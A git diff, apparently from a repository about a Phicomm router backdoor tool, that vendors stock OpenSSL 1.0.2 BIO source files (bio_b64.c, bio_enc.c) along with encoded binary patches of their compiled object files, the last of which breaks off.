+                OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+                /*
+                 * Since we're now done using the temporary buffer, the
+                 * length should be 0'd
+                 */
+                ctx->tmp_len = 0;
+            } else {
+                if (n < 3) {
+                    memcpy(ctx->tmp, in, n);
+                    ctx->tmp_len = n;
+                    ret += n;
+                    break;
+                }
+                n -= n % 3;
+                ctx->buf_len =
+                    EVP_EncodeBlock((unsigned char *)ctx->buf,
+                                    (const unsigned char *)in, n);
+                OPENSSL_assert(ctx->buf_len <= (int)sizeof(ctx->buf));
+                OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+                ret += n;
+            }
+        } else {
+            EVP_EncodeUpdate(&(ctx->base64),
+                             (unsigned char *)ctx->buf, &ctx->buf_len,
+                             (unsigned char *)in, n);
+            OPENSSL_assert(ctx->buf_len <= (int)sizeof(ctx->buf));
+            OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+            ret += n;
+        }
+        inl -= n;
+        in += n;
+
+        ctx->buf_off = 0;
+        n = ctx->buf_len;
+        while (n > 0) {
+            i = BIO_write(b->next_bio, &(ctx->buf[ctx->buf_off]), n);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+                return ((ret == 0) ? i : ret);
+            }
+            OPENSSL_assert(i <= n);
+            n -= i;
+            ctx->buf_off += i;
+            OPENSSL_assert(ctx->buf_off <= (int)sizeof(ctx->buf));
+            OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+        }
+        ctx->buf_len = 0;
+        ctx->buf_off = 0;
+    }
+    return (ret);
+}
+
+static long b64_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO_B64_CTX *ctx;
+    long ret = 1;
+    int i;
+
+    ctx = (BIO_B64_CTX *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ctx->cont = 1;
+        ctx->start = 1;
+        ctx->encode = B64_NONE;
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_EOF:         /* More to read */
+        if (ctx->cont <= 0)
+            ret = 1;
+        else
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_WPENDING:    /* More to write in buffer */
+        OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+        ret = ctx->buf_len - ctx->buf_off;
+        if ((ret == 0) && (ctx->encode != B64_NONE)
+            && (ctx->base64.num != 0))
+            ret = 1;
+        else if (ret <= 0)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_PENDING:     /* More to read in buffer */
+        OPENSSL_assert(ctx->buf_len >= ctx->buf_off);
+        ret = ctx->buf_len - ctx->buf_off;
+        if (ret <= 0)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_FLUSH:
+        /* do a final write */
+ again:
+        while (ctx->buf_len != ctx->buf_off) {
+            i = b64_write(b, NULL, 0);
+            if (i < 0)
+                return i;
+        }
+        if (BIO_get_flags(b) & BIO_FLAGS_BASE64_NO_NL) {
+            if (ctx->tmp_len != 0) {
+                ctx->buf_len = EVP_EncodeBlock((unsigned char *)ctx->buf,
+                                               (unsigned char *)ctx->tmp,
+                                               ctx->tmp_len);
+                ctx->buf_off = 0;
+                ctx->tmp_len = 0;
+                goto again;
+            }
+        } else if (ctx->encode != B64_NONE && ctx->base64.num != 0) {
+            ctx->buf_off = 0;
+            EVP_EncodeFinal(&(ctx->base64),
+                            (unsigned char *)ctx->buf, &(ctx->buf_len));
+            /* push out the bytes */
+            goto again;
+        }
+        /* Finally flush the underlying BIO */
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+
+    case BIO_CTRL_DUP:
+        break;
+    case BIO_CTRL_INFO:
+    case BIO_CTRL_GET:
+    case BIO_CTRL_SET:
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static long b64_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int b64_puts(BIO *b, const char *str)
+{
+    return b64_write(b, str, strlen(str));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_b64.o
new file mode 100644
index 0000000000000000000000000000000000000000..117843da81e5729ba3aac51fd3c0e0c2c8736591
GIT binary patch
literal 9824
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.c
new file mode 100644
index 0000000..363e024
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.c
@@ -0,0 +1,428 @@
+/* crypto/evp/bio_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/evp.h>
+
+static int enc_write(BIO *h, const char *buf, int num);
+static int enc_read(BIO *h, char *buf, int size);
+/*
+ * static int enc_puts(BIO *h, const char *str);
+ */
+/*
+ * static int enc_gets(BIO *h, char *str, int size);
+ */
+static long enc_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int enc_new(BIO *h);
+static int enc_free(BIO *data);
+static long enc_callback_ctrl(BIO *h, int cmd, bio_info_cb *fps);
+#define ENC_BLOCK_SIZE  (1024*4)
+#define BUF_OFFSET      (EVP_MAX_BLOCK_LENGTH*2)
+
+typedef struct enc_struct {
+    int buf_len;
+    int buf_off;
+    int cont;                   /* <= 0 when finished */
+    int finished;
+    int ok;                     /* bad decrypt */
+    EVP_CIPHER_CTX cipher;
+    /*
+     * buf is larger than ENC_BLOCK_SIZE because EVP_DecryptUpdate can return
+     * up to a block more data than is presented to it
+     */
+    char buf[ENC_BLOCK_SIZE + BUF_OFFSET + 2];
+} BIO_ENC_CTX;
+
+static BIO_METHOD methods_enc = {
+    BIO_TYPE_CIPHER, "cipher",
+    enc_write,
+    enc_read,
+    NULL,                       /* enc_puts, */
+    NULL,                       /* enc_gets, */
+    enc_ctrl,
+    enc_new,
+    enc_free,
+    enc_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_cipher(void)
+{
+    return (&methods_enc);
+}
+
+static int enc_new(BIO *bi)
+{
+    BIO_ENC_CTX *ctx;
+
+    ctx = (BIO_ENC_CTX *)OPENSSL_malloc(sizeof(BIO_ENC_CTX));
+    if (ctx == NULL)
+        return (0);
+    EVP_CIPHER_CTX_init(&ctx->cipher);
+
+    ctx->buf_len = 0;
+    ctx->buf_off = 0;
+    ctx->cont = 1;
+    ctx->finished = 0;
+    ctx->ok = 1;
+
+    bi->init = 0;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    return (1);
+}
+
+static int enc_free(BIO *a)
+{
+    BIO_ENC_CTX *b;
+
+    if (a == NULL)
+        return (0);
+    b = (BIO_ENC_CTX *)a->ptr;
+    EVP_CIPHER_CTX_cleanup(&(b->cipher));
+    OPENSSL_cleanse(a->ptr, sizeof(BIO_ENC_CTX));
+    OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int enc_read(BIO *b, char *out, int outl)
+{
+    int ret = 0, i;
+    BIO_ENC_CTX *ctx;
+
+    if (out == NULL)
+        return (0);
+    ctx = (BIO_ENC_CTX *)b->ptr;
+
+    if ((ctx == NULL) || (b->next_bio == NULL))
+        return (0);
+
+    /* First check if there are bytes decoded/encoded */
+    if (ctx->buf_len > 0) {
+        i = ctx->buf_len - ctx->buf_off;
+        if (i > outl)
+            i = outl;
+        memcpy(out, &(ctx->buf[ctx->buf_off]), i);
+        ret = i;
+        out += i;
+        outl -= i;
+        ctx->buf_off += i;
+        if (ctx->buf_len == ctx->buf_off) {
+            ctx->buf_len = 0;
+            ctx->buf_off = 0;
+        }
+    }
+
+    /*
+     * At this point, we have room of outl bytes and an empty buffer, so we
+     * should read in some more.
+     */
+
+    while (outl > 0) {
+        if (ctx->cont <= 0)
+            break;
+
+        /*
+         * read in at IV offset, read the EVP_Cipher documentation about why
+         */
+        i = BIO_read(b->next_bio, &(ctx->buf[BUF_OFFSET]), ENC_BLOCK_SIZE);
+
+        if (i <= 0) {
+            /* Should be continue next time we are called? */
+            if (!BIO_should_retry(b->next_bio)) {
+                ctx->cont = i;
+                i = EVP_CipherFinal_ex(&(ctx->cipher),
+                                       (unsigned char *)ctx->buf,
+                                       &(ctx->buf_len));
+                ctx->ok = i;
+                ctx->buf_off = 0;
+            } else {
+                ret = (ret == 0) ? i : ret;
+                break;
+            }
+        } else {
+            EVP_CipherUpdate(&(ctx->cipher),
+                             (unsigned char *)ctx->buf, &ctx->buf_len,
+                             (unsigned char *)&(ctx->buf[BUF_OFFSET]), i);
+            ctx->cont = 1;
+            /*
+             * Note: it is possible for EVP_CipherUpdate to decrypt zero
+             * bytes because this is or looks like the final block: if this
+             * happens we should retry and either read more data or decrypt
+             * the final block
+             */
+            if (ctx->buf_len == 0)
+                continue;
+        }
+
+        if (ctx->buf_len <= outl)
+            i = ctx->buf_len;
+        else
+            i = outl;
+        if (i <= 0)
+            break;
+        memcpy(out, ctx->buf, i);
+        ret += i;
+        ctx->buf_off = i;
+        outl -= i;
+        out += i;
+    }
+
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return ((ret == 0) ? ctx->cont : ret);
+}
+
+static int enc_write(BIO *b, const char *in, int inl)
+{
+    int ret = 0, n, i;
+    BIO_ENC_CTX *ctx;
+
+    ctx = (BIO_ENC_CTX *)b->ptr;
+    ret = inl;
+
+    BIO_clear_retry_flags(b);
+    n = ctx->buf_len - ctx->buf_off;
+    while (n > 0) {
+        i = BIO_write(b->next_bio, &(ctx->buf[ctx->buf_off]), n);
+        if (i <= 0) {
+            BIO_copy_next_retry(b);
+            return (i);
+        }
+        ctx->buf_off += i;
+        n -= i;
+    }
+    /* at this point all pending data has been written */
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+
+    ctx->buf_off = 0;
+    while (inl > 0) {
+        n = (inl > ENC_BLOCK_SIZE) ? ENC_BLOCK_SIZE : inl;
+        EVP_CipherUpdate(&(ctx->cipher),
+                         (unsigned char *)ctx->buf, &ctx->buf_len,
+                         (unsigned char *)in, n);
+        inl -= n;
+        in += n;
+
+        ctx->buf_off = 0;
+        n = ctx->buf_len;
+        while (n > 0) {
+            i = BIO_write(b->next_bio, &(ctx->buf[ctx->buf_off]), n);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+                return (ret == inl) ? i : ret - inl;
+            }
+            n -= i;
+            ctx->buf_off += i;
+        }
+        ctx->buf_len = 0;
+        ctx->buf_off = 0;
+    }
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static long enc_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO *dbio;
+    BIO_ENC_CTX *ctx, *dctx;
+    long ret = 1;
+    int i;
+    EVP_CIPHER_CTX **c_ctx;
+
+    ctx = (BIO_ENC_CTX *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ctx->ok = 1;
+        ctx->finished = 0;
+        EVP_CipherInit_ex(&(ctx->cipher), NULL, NULL, NULL, NULL,
+                          ctx->cipher.encrypt);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_EOF:         /* More to read */
+        if (ctx->cont <= 0)
+            ret = 1;
+        else
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_WPENDING:
+        ret = ctx->buf_len - ctx->buf_off;
+        if (ret <= 0)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_PENDING:     /* More to read in buffer */
+        ret = ctx->buf_len - ctx->buf_off;
+        if (ret <= 0)
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_FLUSH:
+        /* do a final write */
+ again:
+        while (ctx->buf_len != ctx->buf_off) {
+            i = enc_write(b, NULL, 0);
+            if (i < 0)
+                return i;
+        }
+
+        if (!ctx->finished) {
+            ctx->finished = 1;
+            ctx->buf_off = 0;
+            ret = EVP_CipherFinal_ex(&(ctx->cipher),
+                                     (unsigned char *)ctx->buf,
+                                     &(ctx->buf_len));
+            ctx->ok = (int)ret;
+            if (ret <= 0)
+                break;
+
+            /* push out the bytes */
+            goto again;
+        }
+
+        /* Finally flush the underlying BIO */
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_C_GET_CIPHER_STATUS:
+        ret = (long)ctx->ok;
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+    case BIO_C_GET_CIPHER_CTX:
+        c_ctx = (EVP_CIPHER_CTX **)ptr;
+        (*c_ctx) = &(ctx->cipher);
+        b->init = 1;
+        break;
+    case BIO_CTRL_DUP:
+        dbio = (BIO *)ptr;
+        dctx = (BIO_ENC_CTX *)dbio->ptr;
+        EVP_CIPHER_CTX_init(&dctx->cipher);
+        ret = EVP_CIPHER_CTX_copy(&dctx->cipher, &ctx->cipher);
+        if (ret)
+            dbio->init = 1;
+        break;
+    default:
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+}
+
+static long enc_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+/*-
+void BIO_set_cipher_ctx(b,c)
+BIO *b;
+EVP_CIPHER_ctx *c;
+        {
+        if (b == NULL) return;
+
+        if ((b->callback != NULL) &&
+                (b->callback(b,BIO_CB_CTRL,(char *)c,BIO_CTRL_SET,e,0L) <= 0))
+                return;
+
+        b->init=1;
+        ctx=(BIO_ENC_CTX *)b->ptr;
+        memcpy(ctx->cipher,c,sizeof(EVP_CIPHER_CTX));
+
+        if (b->callback != NULL)
+                b->callback(b,BIO_CB_CTRL,(char *)c,BIO_CTRL_SET,e,1L);
+        }
+*/
+
+void BIO_set_cipher(BIO *b, const EVP_CIPHER *c, const unsigned char *k,
+                    const unsigned char *i, int e)
+{
+    BIO_ENC_CTX *ctx;
+
+    if (b == NULL)
+        return;
+
+    if ((b->callback != NULL) &&
+        (b->callback(b, BIO_CB_CTRL, (const char *)c, BIO_CTRL_SET, e, 0L) <=
+         0))
+        return;
+
+    b->init = 1;
+    ctx = (BIO_ENC_CTX *)b->ptr;
+    EVP_CipherInit_ex(&(ctx->cipher), c, NULL, k, i, e);
+
+    if (b->callback != NULL)
+        b->callback(b, BIO_CB_CTRL, (const char *)c, BIO_CTRL_SET, e, 1L);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/bio_enc.o
new file mode 100644
index 0000000000000000000000000000000000000000..e467401a4eeb55af371a300e810e11f8258842bf
GIT binary patch
literal 6424
zcmb_hUu;v?8NZHA@gQ6q=r%L@#}wF-0iMn1aE3s+v2T2h91@7bSOaq%b0HD=hkY~1
z(2_C7v`5CFRrkOiCSI7-hi%fdJ(RYiW`TN@05K${ZD>>0K?h3_P&(GN1@HULJtsN2
z*e~5a>H3`WJKz8Foj-w5HP&2Xvq_w6(k5wU#8F8){`gG4k#-xUMbbj)p6jWPwftyM
z%ax5eH*q3RoItQcBM)BBz*s9hi*Wl}&V`b+^#=AeG7%_hxvR!Ew89~e36<<P^BUUL
zN+Bn<rI4F8st2buvddpmz1V%Oa~HLtd`sD`bSQB(aIK?V%f9c?a`#<h5fIYy34fG4
z1RJig^*GLs1|`?nYUt+eQSvWxC0872&{FM=7`a`4Nh|z%aS;?ZoKwizuxrcpXzF~p
z{`$R>`H&-Qn<ODelswpAADXL~ZpI34V3u;XT;p$mSoV-pa*h8IdeQty@O8;8Nip(}
z#-)&At~eS&{InAoNO(mpoe1Zlmn#k}50j8nEBvYmlb8*S{F%;|LJmMA5^_&{P0d|X
zUE#^8Z3176{D-q<H$bXr#$01P<#M@U6}jQsVuuKqX{k#PAQK~J?wwR@XCa#Ub5Yxs
zn;U^QM*e-;1$L-S7|<5%4LQR3lvB%|^@Pb}=PqTZvP=1nl3;0%lCrWrO72rpT!9X9
z#asZ$I}2}Bc-20Kn!7c!PD?@lphm*vpO9#Kk(+~DLv9wtNSTV<#0gu-q12z7Dz)HB
